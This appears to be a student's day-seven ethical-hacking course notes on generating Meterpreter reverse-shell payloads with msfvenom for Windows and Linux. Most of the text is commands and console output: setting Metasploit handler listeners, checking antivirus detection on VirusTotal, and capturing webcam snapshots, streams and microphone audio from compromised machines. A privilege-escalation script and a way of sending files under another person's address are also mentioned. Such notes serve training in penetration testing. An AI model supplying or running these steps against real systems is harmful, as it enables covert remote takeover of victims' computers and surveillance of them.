

###################### DAY7 ########################

1. Malware threads module :

Commands For this :
# msfvenom -p <payload> LHOST=<your-ip> LPORT=<some-Port> -f <file-format> -o <output-directory>

-----------------------------------------------------------------------------------------------------------------------

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.137 LPORT=4455 -f exe -o /root/Desktop/amit.exe
it create the exe file which name is amit.exr in the desktop but our system is not ready to take a request from this so we need to use handler in metasploit framework for shell execution create


#msf > use exploit/multi/handler : for running the handler 

#msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp  # settting the payload for this 

#msf exploit(multi/handler) > set LHOST 192.168.0.137 (myip: same ip in msfvenom syntax)
LHOST => 192.168.0.137
#msf exploit(multi/handler) > set LPORT 5566 (any port same port in msfvenom syntax)
LPORT => 5566


#exploit -j Run this as background job 

#### we set as a listner :::::::::::::::::::: so if any person is taking our exe and compile in the system then we will get the established connection :)

jobs
sessions
---------------------------------------------------------------------------------------------------------------------------------

########## virustotla website : where we need to upload our file and check it's any antivirus is there which create problem



##################################################################################################################

for windows 10 ::::

# msfvenom -l formats

# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.132 LPORT=3344 -f msi-nouac -o /root/Desktop/amit.msi

Run a multi hander and run job for differnet Port :
#msf > use exploit/multi/handler : for running the handler 

#msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp  # settting the payload for this 

#msf exploit(multi/handler) > set LHOST 192.168.0.137 (myip: same ip in msfvenom syntax)
LHOST => 192.168.0.137
#msf exploit(multi/handler) > set LPORT 5566 (any port same port in msfvenom syntax)
LPORT => 5566


#exploit -j Run this as background job 

sessions -i 1 


###### 
webcam_list
webcam_snap -i 1
webcam_stream

recordmic -d 5

###############################################################################################################



FOR linux

for 32bit target :
root@root:~/Desktop/GIT/CEH# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.224 LPORT=5566 -f elf -o /var/www/html/amit.elf

[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
Saved as: /var/www/html/testforkali.elf
root@root:~/Desktop/GIT/CEH# service postgreslq start
Failed to start postgreslq.service: Unit postgreslq.service not found.
root@root:~/Desktop/GIT/CEH# service postgresql start
root@root:~/Desktop/GIT/CEH# msfconsole -q
msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.0.224
LHOST => 192.168.0.224
msf5 exploit(multi/handler) > set LPORT 5566
LPORT => 5566
msf5 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.0.224:5566 


Github repo for getting prev access

https://github.com/amittttt/LinEnum clone this 
then RUN ./LinEnum.sh
after this type : shell we will get access for the system 


################################# Watch Movie : Trojan Horse same as one malware 



##############################################################################################################
----->  DarkComet is the malware which take access for any system 
-----> Remcos is the new one malware :::::: {Malware thread}


############### 
https://wetransfer.com/ use it for sending the email (kissi ki bhi id se kiss ko bhi )






***********************************************************************************************************************************************

## https://ghidra-sre.org/ tool is relased by :: Developed by NSA
helps us to do reverse enginerring

# in linux system we have tool called as Radare2 for doing reverse enginerring  																																																																																																																																																																																																																																																																																																																																	
Reverse Enginerring youtube channel : OALabs


